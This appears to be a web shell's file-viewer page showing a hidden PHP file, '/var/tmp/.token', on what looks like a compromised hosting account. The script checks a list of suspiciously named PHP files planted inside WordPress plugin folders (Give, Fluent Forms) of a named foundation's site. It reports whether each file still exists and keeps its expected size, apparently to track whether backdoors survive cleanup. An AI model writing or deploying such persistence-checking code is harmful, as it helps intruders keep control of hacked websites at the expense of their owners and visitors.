Your IP : 216.73.216.158
| Current Path : /var/tmp/ |
|
|
| Current File : //var/tmp/.token |
<?php $r = '/home/travuxru/hopespherefoundation.org'; $x = ["/wp-content/plugins/give/src/FormBuilder/resources/views/admin.form.builder.php"=>"bd@@156354053@@545",
"/wp-content/plugins/give/src/DonationForms/V2/ListTable/Columns/ricerca.php"=>"bd@@226246927@@619",
"/wp-content/plugins/fluentform/vendor/wpfluent/framework/src/WPFluent/Response/nav.inc.php"=>"bd@@178469650@@712",
"/wp-content/plugins/give/vendor/tecnickcom/tcpdf/examples/lang/chi.php"=>"bd@@232600602@@1869"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');